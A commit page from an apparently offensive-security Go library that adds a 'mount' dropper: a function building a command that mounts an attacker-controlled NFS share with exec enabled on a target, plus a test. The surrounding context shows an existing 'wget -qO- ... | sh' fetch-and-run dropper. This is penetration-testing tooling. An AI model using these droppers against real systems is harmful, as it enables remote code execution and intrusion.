Merge pull request #427 from vulncheck-oss/mountv3Only

j-baines · web-flow · commit 88ae33821ce6 · 2025-07-21T14:51:14.000-04:00
Adds a `mount` binary dropper
diff --git a/payload/dropper/dropper_test.go b/payload/dropper/dropper_test.go
@@ -181,3 +181,10 @@ func TestPHPHTTP(t *testing.T) {
 		t.Fatal("Mysterious inclusion of SSL logic")
 	}
 }
+
+func TestMountV3Only(t *testing.T) {
+	mountPayload := dropper.Unix.Mountv3Only("127.0.0.1", "/tmp/nfsshare", "./dir")
+	if mountPayload != "mount -o vers=3,nolock,exec,tcp -t nfs 127.0.0.1:/tmp/nfsshare ./dir" {
+		t.Fatal("Unexpected Mountv3Only formatting")
+	}
+}
diff --git a/payload/dropper/unix.go b/payload/dropper/unix.go
@@ -54,3 +54,13 @@ func (unix *UnixPayload) WgetHTTP(lhost string, lport int, ssl bool, downloadFil
 
 	return fmt.Sprintf("wget -qO- http://%s | sh", uri)
 }
+
+// Mount a remote NFS directory using NFS v3. This will mount the attacker controlled share at
+// <lhost>:<lshareDir> and make it available to the attacker at <rshareDir>. Usage example:
+//
+//	Mountv3Only("10.9.49.2","/tmp/nfsshare", "./b")
+//
+// This function does not attempt to actually execute any files on the share
+func (unix *UnixPayload) Mountv3Only(lhost string, lshareDir string, rshareDir string) string {
+	return fmt.Sprintf("mount -o vers=3,nolock,exec,tcp -t nfs %s:%s %s", lhost, lshareDir, rshareDir)
+}

Original file line number	Diff line number	Diff line change
`@@ -181,3 +181,10 @@ func TestPHPHTTP(t *testing.T) {`
`181`	`181`	`t.Fatal("Mysterious inclusion of SSL logic")`
`182`	`182`	`}`
`183`	`183`	`}`
	`184`	`+`
	`185`	`+func TestMountV3Only(t *testing.T) {`
	`186`	`+ mountPayload := dropper.Unix.Mountv3Only("127.0.0.1", "/tmp/nfsshare", "./dir")`
	`187`	`+ if mountPayload != "mount -o vers=3,nolock,exec,tcp -t nfs 127.0.0.1:/tmp/nfsshare ./dir" {`
	`188`	`+ t.Fatal("Unexpected Mountv3Only formatting")`
	`189`	`+ }`
	`190`	`+}`